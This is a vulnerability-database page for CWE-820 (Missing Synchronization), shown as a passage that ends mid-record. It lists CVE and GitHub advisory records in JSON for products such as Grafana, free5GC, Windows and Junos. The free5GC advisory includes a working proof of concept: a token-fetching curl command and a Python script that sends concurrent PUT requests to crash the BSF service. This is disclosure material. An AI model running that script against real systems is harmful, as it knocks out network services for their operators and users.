CWE-820
AllowedMissing Synchronization
Abstraction: Base · Status: Incomplete
The product utilizes a shared resource in a concurrent manner but does not attempt to synchronize access to the resource.
29 vulnerabilities reference this CWE, most recent first.
CVE-2023-2801 (GCVE-0-2023-2801)
Vulnerability from cvelistv5 – Published: 2023-06-06 18:03 – Updated: 2025-02-13 16:45| Vendor | Product | Version | |
|---|---|---|---|
| Grafana | Grafana |
Affected:
9.4.0 , < 9.4.12
(semver)
Affected: 9.5.0 , < 9.5.3 (semver) |
|
| Grafana | Grafana Enterprise |
Affected:
9.4.0 , < 9.4.12
(semver)
Affected: 9.5.0 , < 9.5.3 (semver) |
{
"containers": {
"adp": [
{
"providerMetadata": {
"dateUpdated": "2024-08-02T06:33:05.564Z",
"orgId": "af854a3a-2127-422b-91ae-364da2661108",
"shortName": "CVE"
},
"references": [
{
"tags": [
"x_transferred"
],
"url": "https://grafana.com/security/security-advisories/cve-2023-2801/"
},
{
"tags": [
"x_transferred"
],
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
],
"title": "CVE Program Container"
},
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2023-2801",
"options": [
{
"Exploitation": "none"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-01-07T18:27:46.406382Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-01-07T18:27:59.835Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "Grafana",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.4.12",
"status": "affected",
"version": "9.4.0",
"versionType": "semver"
},
{
"lessThan": "9.5.3",
"status": "affected",
"version": "9.5.0",
"versionType": "semver"
}
]
},
{
"product": "Grafana Enterprise",
"vendor": "Grafana",
"versions": [
{
"lessThan": "9.4.12",
"status": "affected",
"version": "9.4.0",
"versionType": "semver"
},
{
"lessThan": "9.5.3",
"status": "affected",
"version": "9.5.0",
"versionType": "semver"
}
]
}
],
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "\u003cp\u003eGrafana is an open-source platform for monitoring and observability. \u003c/p\u003e\u003cp\u003eUsing public dashboards users can query multiple distinct data sources using mixed queries. However such query has a possibility of crashing a Grafana instance.\u003c/p\u003e\u003cp\u003eThe only feature that uses mixed queries at the moment is public dashboards, but it\u0027s also possible to cause this by calling the query API directly.\u003c/p\u003e\u003cp\u003eThis might enable malicious users to crash Grafana instances through that endpoint.\u003c/p\u003e\u003cp\u003eUsers may upgrade to version 9.4.12 and 9.5.3 to receive a fix.\u003c/p\u003e"
}
],
"value": "Grafana is an open-source platform for monitoring and observability. \n\nUsing public dashboards users can query multiple distinct data sources using mixed queries. However such query has a possibility of crashing a Grafana instance.\n\nThe only feature that uses mixed queries at the moment is public dashboards, but it\u0027s also possible to cause this by calling the query API directly.\n\nThis might enable malicious users to crash Grafana instances through that endpoint.\n\nUsers may upgrade to version 9.4.12 and 9.5.3 to receive a fix."
}
],
"impacts": [
{
"capecId": "CAPEC-26",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-26"
}
]
}
],
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-820",
"description": "CWE-820",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2023-07-06T18:06:29.011Z",
"orgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"shortName": "GRAFANA"
},
"references": [
{
"url": "https://grafana.com/security/security-advisories/cve-2023-2801/"
},
{
"url": "https://security.netapp.com/advisory/ntap-20230706-0002/"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "57da9224-a3e2-4646-9d0e-c4dc2e05e7da",
"assignerShortName": "GRAFANA",
"cveId": "CVE-2023-2801",
"datePublished": "2023-06-06T18:03:32.459Z",
"dateReserved": "2023-05-18T16:22:13.573Z",
"dateUpdated": "2025-02-13T16:45:38.503Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2022-50238 (GCVE-0-2022-50238)
Vulnerability from cvelistv5 – Published: 2025-09-08 00:00 – Updated: 2025-11-17 16:01 Disputed{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2022-50238",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-10-30T01:13:02.958357Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-184",
"description": "CWE-184 Incomplete List of Disallowed Inputs",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-11-17T16:01:40.773Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unknown",
"product": "Windows",
"vendor": "Microsoft",
"versions": [
{
"lessThanOrEqual": "Server 2025",
"status": "affected",
"version": "10",
"versionType": "custom"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "The on-endpoint Microsoft vulnerable driver blocklist is not fully synchronized with the online Microsoft recommended driver block rules. Some entries present on the online list have been excluded from the on-endpoint blocklist longer than the expected periodic monthly Windows updates. It is possible to fully synchronize the driver blocklist using WDAC policies. NOTE: The vendor explains that Windows Update provides a smaller, compatibility-focused driver blocklist for general users, while the full XML list is available for advanced users and organizations to customize at the risk of usability issues."
}
],
"metrics": [
{
"cvssV3_1": {
"baseScore": 7.4,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-820",
"description": "CWE-820 Missing Synchronization",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-10-17T18:55:11.829Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/wdormann/applywdac"
},
{
"url": "https://learn.microsoft.com/en-us/windows/security/application-security/application-control/app-control-for-business/design/microsoft-recommended-driver-block-rules"
}
],
"tags": [
"disputed"
],
"x_generator": {
"engine": "enrichogram 0.0.1"
}
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2022-50238",
"datePublished": "2025-09-08T00:00:00.000Z",
"dateReserved": "2025-09-08T00:00:00.000Z",
"dateUpdated": "2025-11-17T16:01:40.773Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
GHSA-27PH-8Q4F-H7M7
Vulnerability from github – Published: 2026-05-08 22:41 – Updated: 2026-06-08 20:11Summary
free5GC's BSF PUT /nbsf-management/v1/subscriptions/{subId} handler has an unsynchronized write on the global Subscriptions map. The handler first reads the map under RLock() via BSFContext.GetSubscription(subId), but if the subscription does not exist, ReplaceIndividualSubcription() writes back to the same map directly without taking the mutex (bsfContext.BsfSelf.Subscriptions[subId] = subscription). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with fatal error: concurrent map read and map write (Go runtime panics that come from concurrent map access bypass recover() and terminate the process). The BSF container exits with code 2 -- the entire BSF SBI surface goes down until restart.
This endpoint requires a valid nbsf-management OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS.
Details
Validated against the BSF container in the official Docker compose lab.
- Source repo tag: v4.2.1
- Running Docker image: free5gc/bsf:v4.2.1
- Docker validation date: 2026-03-22
- BSF endpoint: http://10.100.200.11:8000
Read side (locked):
func (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) {
c.mutex.RLock()
defer c.mutex.RUnlock()
sub, exists := c.Subscriptions[subId]
return sub, exists
}
Unsafe write side in the create-if-absent branch of ReplaceIndividualSubcription (no Lock()):
subscription.SubId = subId
bsfContext.BsfSelf.Subscriptions[subId] = subscription
Under concurrent traffic, the Go runtime detects the unsynchronized read/write on c.Subscriptions and aborts the process. Go's concurrent map read and map write fatal is NOT a normal panic -- it is unrecoverable, Gin's recovery middleware does not catch it, and the BSF process terminates.
Code evidence (paths in free5gc/bsf):
- Read side (locked):
- NFs/bsf/internal/sbi/processor/subscriptions.go:81
- NFs/bsf/internal/context/context.go:726
- NFs/bsf/internal/context/context.go:730
- Unsafe write side (the create-if-absent branch in PUT, no lock):
- NFs/bsf/internal/sbi/processor/subscriptions.go:111
- NFs/bsf/internal/sbi/processor/subscriptions.go:114
The normal locked helpers (CreateSubscription(), GetSubscription(), UpdateSubscription(), DeleteSubscription()) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch.
PoC
Reproduced end-to-end against the running BSF at http://10.100.200.11:8000.
- Obtain a valid
nbsf-managementtoken from NRF:
curl -sS -X POST 'http://10.100.200.3:8000/oauth2/token' \
-H 'Content-Type: application/x-www-form-urlencoded' \
--data 'grant_type=client_credentials&nfType=NEF&nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57&targetNfType=BSF&scope=nbsf-management'
- Send concurrent PUT requests against fresh
subIdvalues (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs):
import json, threading, urllib.request
TOKEN = "<valid_nbsf_management_jwt>"
BASE = "http://10.100.200.11:8000/nbsf-management/v1"
PAYLOAD = json.dumps({
"events": ["PCF_BINDING_CREATION"],
"notifUri": "http://127.0.0.1/cb",
"notifCorreId": "1",
"supi": "imsi-208930000000003",
}).encode()
def send_put(i, n):
url = f"{BASE}/subscriptions/race-mix-{i}-{n}"
req = urllib.request.Request(url, data=PAYLOAD, method="PUT")
req.add_header("Authorization", f"Bearer {TOKEN}")
req.add_header("Content-Type", "application/json")
urllib.request.urlopen(req, timeout=2).read()
threads = []
for i in range(64):
for n in range(50):
threads.append(threading.Thread(target=send_put, args=(i, n)))
for t in threads: t.start()
for t in threads: t.join()
- BSF container logs (
docker logs bsf) show the Go runtime fatal that terminated the process:
[INFO][BSF][Proc] Handle ReplaceIndividualSubcription
fatal error: concurrent map read and map write
github.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300)
github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f
- Container state confirms exit code 2:
exited|2|0
Impact
Unsynchronized concurrent access (CWE-362) to a shared map (BsfSelf.Subscriptions), combined with missing synchronization on the create-if-absent branch (CWE-820). Go's runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin's recover() middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF's nbsf-management SBI surface (PCF binding lookups for SMF, AF -> PCF binding discovery, etc.) until restart.
Any party that holds (or can obtain) a valid nbsf-management token can:
- Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh subId values, deterministically tripping the runtime fatal and killing the BSF process.
- Repeat the trigger after every restart to sustain the outage.
No Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint.
Affected: free5gc v4.2.1.
Upstream issue: https://github.com/free5gc/free5gc/issues/926 Upstream fix: https://github.com/free5gc/bsf/pull/7
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/free5gc/bsf"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "1.0.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-44318"
],
"database_specific": {
"cwe_ids": [
"CWE-362",
"CWE-820"
],
"github_reviewed": true,
"github_reviewed_at": "2026-05-08T22:41:48Z",
"nvd_published_at": "2026-05-27T17:16:36Z",
"severity": "MODERATE"
},
"details": "### Summary\nfree5GC\u0027s BSF `PUT /nbsf-management/v1/subscriptions/{subId}` handler has an unsynchronized write on the global `Subscriptions` map. The handler first reads the map under `RLock()` via `BSFContext.GetSubscription(subId)`, but if the subscription does not exist, `ReplaceIndividualSubcription()` writes back to the same map directly without taking the mutex (`bsfContext.BsfSelf.Subscriptions[subId] = subscription`). Under concurrent authenticated PUT load, one goroutine can read while another writes the map, which causes the Go runtime to abort the process with `fatal error: concurrent map read and map write` (Go runtime panics that come from concurrent map access bypass `recover()` and terminate the process). The BSF container exits with code `2` -- the entire BSF SBI surface goes down until restart.\n\nThis endpoint requires a valid `nbsf-management` OAuth2 access token (PR:L, NOT PR:N), so this is scored as an authenticated process-kill DoS.\n\n### Details\nValidated against the BSF container in the official Docker compose lab.\n- Source repo tag: `v4.2.1`\n- Running Docker image: `free5gc/bsf:v4.2.1`\n- Docker validation date: 2026-03-22\n- BSF endpoint: `http://10.100.200.11:8000`\n\nRead side (locked):\n```go\nfunc (c *BSFContext) GetSubscription(subId string) (*BsfSubscription, bool) {\n c.mutex.RLock()\n defer c.mutex.RUnlock()\n\n sub, exists := c.Subscriptions[subId]\n return sub, exists\n}\n```\n\nUnsafe write side in the create-if-absent branch of `ReplaceIndividualSubcription` (no `Lock()`):\n```go\nsubscription.SubId = subId\nbsfContext.BsfSelf.Subscriptions[subId] = subscription\n```\n\nUnder concurrent traffic, the Go runtime detects the unsynchronized read/write on `c.Subscriptions` and aborts the process. Go\u0027s `concurrent map read and map write` fatal is NOT a normal panic -- it is unrecoverable, Gin\u0027s recovery middleware does not catch it, and the BSF process terminates.\n\nCode evidence (paths in `free5gc/bsf`):\n- Read side (locked):\n - `NFs/bsf/internal/sbi/processor/subscriptions.go:81`\n - `NFs/bsf/internal/context/context.go:726`\n - `NFs/bsf/internal/context/context.go:730`\n- Unsafe write side (the create-if-absent branch in PUT, no lock):\n - `NFs/bsf/internal/sbi/processor/subscriptions.go:111`\n - `NFs/bsf/internal/sbi/processor/subscriptions.go:114`\n\nThe normal locked helpers (`CreateSubscription()`, `GetSubscription()`, `UpdateSubscription()`, `DeleteSubscription()`) DO take the mutex correctly. The bug is specific to the inline write inside the PUT create-if-absent branch.\n\n### PoC\nReproduced end-to-end against the running BSF at `http://10.100.200.11:8000`.\n\n1. Obtain a valid `nbsf-management` token from NRF:\n```\ncurl -sS -X POST \u0027http://10.100.200.3:8000/oauth2/token\u0027 \\\n -H \u0027Content-Type: application/x-www-form-urlencoded\u0027 \\\n --data \u0027grant_type=client_credentials\u0026nfType=NEF\u0026nfInstanceId=eb9990de-4cd3-41b0-b5d9-c2102b088c57\u0026targetNfType=BSF\u0026scope=nbsf-management\u0027\n```\n\n2. Send concurrent PUT requests against fresh `subId` values (the validated lab uses 64 worker threads x 50 fresh subIds = 3200 concurrent PUTs):\n```python\nimport json, threading, urllib.request\n\nTOKEN = \"\u003cvalid_nbsf_management_jwt\u003e\"\nBASE = \"http://10.100.200.11:8000/nbsf-management/v1\"\nPAYLOAD = json.dumps({\n \"events\": [\"PCF_BINDING_CREATION\"],\n \"notifUri\": \"http://127.0.0.1/cb\",\n \"notifCorreId\": \"1\",\n \"supi\": \"imsi-208930000000003\",\n}).encode()\n\ndef send_put(i, n):\n url = f\"{BASE}/subscriptions/race-mix-{i}-{n}\"\n req = urllib.request.Request(url, data=PAYLOAD, method=\"PUT\")\n req.add_header(\"Authorization\", f\"Bearer {TOKEN}\")\n req.add_header(\"Content-Type\", \"application/json\")\n urllib.request.urlopen(req, timeout=2).read()\n\nthreads = []\nfor i in range(64):\n for n in range(50):\n threads.append(threading.Thread(target=send_put, args=(i, n)))\nfor t in threads: t.start()\nfor t in threads: t.join()\n```\n\n3. BSF container logs (`docker logs bsf`) show the Go runtime fatal that terminated the process:\n```\n[INFO][BSF][Proc] Handle ReplaceIndividualSubcription\nfatal error: concurrent map read and map write\ngithub.com/free5gc/bsf/internal/sbi/processor.ReplaceIndividualSubcription(0xc000514300)\n github.com/free5gc/bsf/internal/sbi/processor/subscriptions.go:81 +0x15f\n```\n\n4. Container state confirms exit code 2:\n```\nexited|2|0\n```\n\n### Impact\nUnsynchronized concurrent access (CWE-362) to a shared map (`BsfSelf.Subscriptions`), combined with missing synchronization on the create-if-absent branch (CWE-820). Go\u0027s runtime detects concurrent map read/write and terminates the process via a non-recoverable fatal error -- Gin\u0027s `recover()` middleware does NOT catch this class of fatal, unlike ordinary nil-deref panics. The whole BSF process exits, dropping BSF\u0027s `nbsf-management` SBI surface (PCF binding lookups for SMF, AF -\u003e PCF binding discovery, etc.) until restart.\n\nAny party that holds (or can obtain) a valid `nbsf-management` token can:\n- Drive the create-if-absent code path at high concurrency by PUTting a stream of fresh `subId` values, deterministically tripping the runtime fatal and killing the BSF process.\n- Repeat the trigger after every restart to sustain the outage.\n\nNo Confidentiality impact (the crash returns no attacker-readable data). No persistent Integrity impact (BSF subscription state is in-memory and is lost when the process dies). The whole impact concentrates in Availability: complete loss of BSF service via concurrent attacker traffic on a single endpoint.\n\nAffected: free5gc v4.2.1.\n\nUpstream issue: https://github.com/free5gc/free5gc/issues/926\nUpstream fix: https://github.com/free5gc/bsf/pull/7",
"id": "GHSA-27ph-8q4f-h7m7",
"modified": "2026-06-08T20:11:57Z",
"published": "2026-05-08T22:41:48Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/security/advisories/GHSA-27ph-8q4f-h7m7"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-44318"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/free5gc/issues/926"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/bsf/pull/7"
},
{
"type": "WEB",
"url": "https://github.com/free5gc/bsf/commit/277908565fd628d974a13ef562b81a8b7b519ffa"
},
{
"type": "PACKAGE",
"url": "https://github.com/free5gc/free5gc"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "free5GC\u0027s BSF concurrent PUT /nbsf-management/v1/subscriptions/{subId} crashes the BSF process via concurrent map read/write on Subscriptions"
}
GHSA-396Q-83G8-947V
Vulnerability from github – Published: 2024-12-12 03:33 – Updated: 2024-12-12 03:33Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability
{
"affected": [],
"aliases": [
"CVE-2024-49114"
],
"database_specific": {
"cwe_ids": [
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-12-12T02:04:37Z",
"severity": "HIGH"
},
"details": "Windows Cloud Files Mini Filter Driver Elevation of Privilege Vulnerability",
"id": "GHSA-396q-83g8-947v",
"modified": "2024-12-12T03:33:05Z",
"published": "2024-12-12T03:33:05Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-49114"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2024-49114"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-4RJ3-H5C4-JPRH
Vulnerability from github – Published: 2023-12-05 18:30 – Updated: 2023-12-05 18:30An issue exists in SoftIron HyperCloud where drive caddy removal and reinsertion without a reboot may erroneously cause the system to recognize the caddy as new media and wipe all data on the drives due to a missing synchronization flaw, which impacts data availability and integrity.
This issue only impacts SoftIron HyperCloud "density" storage nodes running HyperCloud software versions 1.0 to before 2.0.3.
{
"affected": [],
"aliases": [
"CVE-2023-45084"
],
"database_specific": {
"cwe_ids": [
"CWE-662",
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-12-05T17:15:08Z",
"severity": "HIGH"
},
"details": "An issue exists in SoftIron HyperCloud where drive caddy removal and reinsertion without a reboot may erroneously cause the system to recognize the caddy as new media and wipe all data on the drives due to a missing synchronization flaw, which impacts data availability and integrity.\n\nThis issue only impacts SoftIron HyperCloud \"density\" storage nodes running HyperCloud software versions 1.0 to before 2.0.3.\n\n",
"id": "GHSA-4rj3-h5c4-jprh",
"modified": "2023-12-05T18:30:23Z",
"published": "2023-12-05T18:30:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-45084"
},
{
"type": "WEB",
"url": "https://advisories.softiron.cloud"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:P/AC:L/PR:N/UI:R/S:C/C:N/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FGXJ-VFG7-CPQQ
Vulnerability from github – Published: 2026-06-25 09:31 – Updated: 2026-06-30 03:37In the Linux kernel, the following vulnerability has been resolved:
KVM: arm64: Take the SRCU lock for page table walks in fault injection and AT emulation
walk_s1() and kvm_walk_nested_s2() expect to be called while holding kvm->srcu to guard against memslot changes. While this is generally the case, __kvm_at_s12() and __kvm_find_s1_desc_level() call into the respective walkers without taking kvm->srcu.
Fix by acquiring kvm->srcu prior to the table walk in both instances.
{
"affected": [],
"aliases": [
"CVE-2026-53277"
],
"database_specific": {
"cwe_ids": [
"CWE-662",
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-25T09:16:45Z",
"severity": "HIGH"
},
"details": "In the Linux kernel, the following vulnerability has been resolved:\n\nKVM: arm64: Take the SRCU lock for page table walks in fault injection and AT emulation\n\nwalk_s1() and kvm_walk_nested_s2() expect to be called while holding\nkvm-\u003esrcu to guard against memslot changes. While this is generally\nthe case, __kvm_at_s12() and __kvm_find_s1_desc_level() call into the\nrespective walkers without taking kvm-\u003esrcu.\n\nFix by acquiring kvm-\u003esrcu prior to the table walk in both instances.",
"id": "GHSA-fgxj-vfg7-cpqq",
"modified": "2026-06-30T03:37:13Z",
"published": "2026-06-25T09:31:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-53277"
},
{
"type": "WEB",
"url": "https://access.redhat.com/security/cve/CVE-2026-53277"
},
{
"type": "WEB",
"url": "https://bugzilla.redhat.com/show_bug.cgi?id=2492725"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/97706097f9b851cfe55c3b00b083dfc2bcf542bc"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/ec42b4ed1b072ea2d03f086061aa67bad6d8de39"
},
{
"type": "WEB",
"url": "https://git.kernel.org/stable/c/f2ca45b50d4216c9cc7ffabf50d9ad1932209251"
},
{
"type": "WEB",
"url": "https://security.access.redhat.com/data/csaf/v2/vex/2026/cve-2026-53277.json"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-FM63-79WX-Q4C2
Vulnerability from github – Published: 2026-03-21 00:31 – Updated: 2026-03-23 15:30Requires malware code to misuse the DDK kernel module IOCTL interface.
Such code can use the interface in an unsupported way that allows subversion of the GPU to perform writes to arbitrary physical memory pages.
The product utilises a shared resource in a concurrent manner but does not attempt to synchronise access to the resource.
{
"affected": [],
"aliases": [
"CVE-2026-22163"
],
"database_specific": {
"cwe_ids": [
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-03-20T23:16:42Z",
"severity": "HIGH"
},
"details": "Requires malware code to misuse the DDK kernel module IOCTL interface.\n\nSuch code can use the interface in an unsupported way that allows subversion of the GPU to perform writes to arbitrary physical memory pages.\n\nThe product utilises a shared resource in a concurrent manner but does not attempt to synchronise access to the resource.",
"id": "GHSA-fm63-79wx-q4c2",
"modified": "2026-03-23T15:30:34Z",
"published": "2026-03-21T00:31:42Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-22163"
},
{
"type": "WEB",
"url": "https://www.imaginationtech.com/gpu-driver-vulnerabilities"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-G8G2-3HVQ-W5F4
Vulnerability from github – Published: 2025-05-01 09:32 – Updated: 2025-05-01 09:32LibJS in Ladybird before f5a6704 mishandles the freeing of the vector that arguments_list references, leading to a use-after-free, and allowing remote attackers to execute arbitrary code via a crafted .js file. NOTE: the GitHub README says "Ladybird is in a pre-alpha state, and only suitable for use by developers."
{
"affected": [],
"aliases": [
"CVE-2025-47154"
],
"database_specific": {
"cwe_ids": [
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-05-01T08:15:17Z",
"severity": "CRITICAL"
},
"details": "LibJS in Ladybird before f5a6704 mishandles the freeing of the vector that arguments_list references, leading to a use-after-free, and allowing remote attackers to execute arbitrary code via a crafted .js file. NOTE: the GitHub README says \"Ladybird is in a pre-alpha state, and only suitable for use by developers.\"",
"id": "GHSA-g8g2-3hvq-w5f4",
"modified": "2025-05-01T09:32:27Z",
"published": "2025-05-01T09:32:27Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47154"
},
{
"type": "WEB",
"url": "https://github.com/LadybirdBrowser/ladybird/commit/f5a670421954fc7130c3685b713c621b29516669"
},
{
"type": "WEB",
"url": "https://jessie.cafe/posts/pwning-ladybirds-libjs"
},
{
"type": "WEB",
"url": "https://news.ycombinator.com/item?id=43852096"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-GQVP-4X8M-W6W2
Vulnerability from github – Published: 2025-07-08 18:31 – Updated: 2025-07-08 18:31Missing synchronization in Windows Hyper-V allows an authorized attacker to deny service over an adjacent network.
{
"affected": [],
"aliases": [
"CVE-2025-47999"
],
"database_specific": {
"cwe_ids": [
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2025-07-08T17:15:41Z",
"severity": "MODERATE"
},
"details": "Missing synchronization in Windows Hyper-V allows an authorized attacker to deny service over an adjacent network.",
"id": "GHSA-gqvp-4x8m-w6w2",
"modified": "2025-07-08T18:31:45Z",
"published": "2025-07-08T18:31:45Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-47999"
},
{
"type": "WEB",
"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2025-47999"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:A/AC:L/PR:L/UI:N/S:C/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-H843-JC82-H6JF
Vulnerability from github – Published: 2024-04-12 18:33 – Updated: 2025-02-06 21:32A Missing Synchronization vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on ACX5448 and ACX710 allows an unauthenticated, adjacent attacker to cause a Denial-of-Service (DoS).
If an interface flaps while the system gathers statistics on that interface, two processes simultaneously access a shared resource which leads to a PFE crash and restart.
This issue affects Junos OS:
All versions before 20.4R3-S9,
21.2 versions before 21.2R3-S5,
21.3 versions before 21.3R3-S5,
21.4 versions before 21.4R3-S4,
22.1 versions before 22.1R3-S2,
22.2 versions before 22.2R3-S2,
22.3 versions before 22.3R2-S2, 22.3R3,
22.4 versions before 22.4R2.
{
"affected": [],
"aliases": [
"CVE-2024-30387"
],
"database_specific": {
"cwe_ids": [
"CWE-662",
"CWE-820"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-04-12T16:15:37Z",
"severity": "MODERATE"
},
"details": "A\u00a0Missing Synchronization vulnerability in the Packet Forwarding Engine (PFE) of Juniper Networks Junos OS on ACX5448 and ACX710 allows an unauthenticated, adjacent attacker to cause a Denial-of-Service (DoS).\n\nIf an interface flaps while the system gathers statistics on that interface, two processes simultaneously access a shared resource which leads to a PFE crash and restart.\n\nThis issue affects Junos OS:\n\nAll versions before 20.4R3-S9,\n\n21.2 versions before 21.2R3-S5,\u00a0\n\n21.3 versions before 21.3R3-S5,\u00a0\n\n21.4 versions before 21.4R3-S4,\n\n22.1 versions before 22.1R3-S2,\n\n22.2 versions before 22.2R3-S2,\n\n22.3 versions before 22.3R2-S2, 22.3R3,\n\n22.4 versions before 22.4R2.",
"id": "GHSA-h843-jc82-h6jf",
"modified": "2025-02-06T21:32:04Z",
